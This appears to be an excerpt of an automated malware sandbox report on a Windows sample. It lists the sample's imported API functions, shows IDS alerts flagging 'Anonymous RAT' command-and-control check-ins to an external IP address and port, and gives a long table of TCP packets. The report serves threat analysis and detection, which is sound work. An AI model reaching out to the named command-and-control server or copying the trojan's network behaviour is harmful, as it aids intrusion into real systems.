                                                          KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
                                                          USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                          GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                          SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                          ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                          OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                          MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-26T23:14:32.294393+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.2049754198.44.170.19318091TCP
                                                          2024-12-26T23:20:09.223127+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.2049769198.44.170.19318091TCP
                                                          2024-12-26T23:21:20.832304+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.11.2049773198.44.170.19318091TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 26, 2024 23:14:28.048929930 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:28.356015921 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.356180906 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:28.664506912 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.664685011 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.664695024 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.664726973 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.665467024 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:28.972280979 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972291946 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972549915 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972557068 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:28.972559929 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972567081 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972582102 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972589016 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972681046 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:28.972851038 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.279340982 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279468060 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279489994 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279500961 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279556990 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279567003 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279576063 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279586077 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279670954 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.279794931 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279805899 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279815912 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279876947 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.279901981 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279912949 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.279922962 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.280886889 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.280898094 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.586906910 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.586918116 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587081909 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.587160110 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587167978 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587176085 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587183952 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587239981 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587246895 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587254047 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587302923 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587305069 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587305069 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587390900 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.587451935 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587457895 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.587467909 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587610960 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.587794065 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587846994 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587855101 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.587902069 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588043928 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.588097095 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588151932 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588160038 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588166952 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588329077 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.588341951 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588398933 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588406086 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588413954 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.588526011 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.588572025 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.893990993 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894011974 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894184113 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894231081 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894268990 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894289970 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894304037 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894319057 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894332886 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894346952 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894362926 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894403934 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894432068 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894432068 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894495964 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894525051 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894531012 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894547939 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894568920 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894583941 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894598961 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894613028 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894690990 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894742966 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894747972 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894784927 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894798994 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894824982 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894840002 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894854069 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894867897 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894882917 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.894937992 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894937992 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.894984961 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895035982 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895054102 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895070076 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895159006 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895221949 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895283937 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895308971 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895323038 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895338058 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895351887 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895426035 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895453930 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895533085 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895561934 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895576954 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895591021 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895606041 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895622015 CET1885249753198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:29.895688057 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895688057 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895735979 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:29.895735979 CET4975318852192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:31.981923103 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.293950081 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.294393063 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.294393063 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.606585979 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.607095957 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.607116938 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.919552088 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.923058987 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.923072100 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.923197985 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:32.923301935 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.923310995 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:32.923568010 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.235546112 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235583067 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235615015 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235654116 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235858917 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.235898972 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235924006 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.235944033 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.236226082 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.548060894 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548120975 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548378944 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548420906 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548437119 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.548477888 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548510075 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548590899 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548628092 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548656940 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548686028 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548773050 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.548773050 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.548773050 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.548871040 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.548939943 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.549206018 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.549247026 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.549282074 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.549453974 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.549453974 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.860842943 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.860893011 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.860934019 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.860965014 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861041069 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.861156940 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861213923 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.861416101 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861447096 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861476898 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861506939 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861536980 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861571074 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861649990 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861700058 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861721039 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.861721039 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.861768007 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861799955 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861829042 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861857891 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861888885 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861895084 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.861932039 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861962080 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.861990929 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862020016 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862050056 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862062931 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862062931 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862063885 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862106085 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862135887 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862164974 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862194061 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862235069 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862282038 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:33.862401962 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862401962 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862401962 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:33.862569094 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.173190117 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173264027 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173306942 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173511982 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.173588991 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173625946 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173656940 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173691988 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173722982 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.173871040 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.173871040 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.173909903 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.174509048 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174557924 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174587965 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174618959 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174741983 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.174741983 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.174856901 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174896002 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174926043 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174961090 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.174992085 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175023079 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175051928 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175082922 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175127029 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175127029 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175187111 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175218105 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175246954 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175277948 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175292015 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175292969 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175328016 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175359964 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175411940 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175452948 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175468922 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175468922 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175508976 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175539017 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175569057 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175599098 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175631046 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175636053 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175636053 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175637007 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175681114 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175709963 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175739050 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175767899 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175800085 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175806046 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175843954 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175873995 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175903082 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175931931 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175961018 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.175971985 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.175971985 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176007986 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176038027 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176068068 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176096916 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176126003 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176141977 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176141977 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176173925 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176203012 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176233053 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176261902 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176290989 CET1809149754198.44.170.193192.168.11.20
                                                          Dec 26, 2024 23:14:34.176314116 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176314116 CET4975418091192.168.11.20198.44.170.193
                                                          Dec 26, 2024 23:14:34.176314116 CET4975418091192.168.11.20198.44.170.193
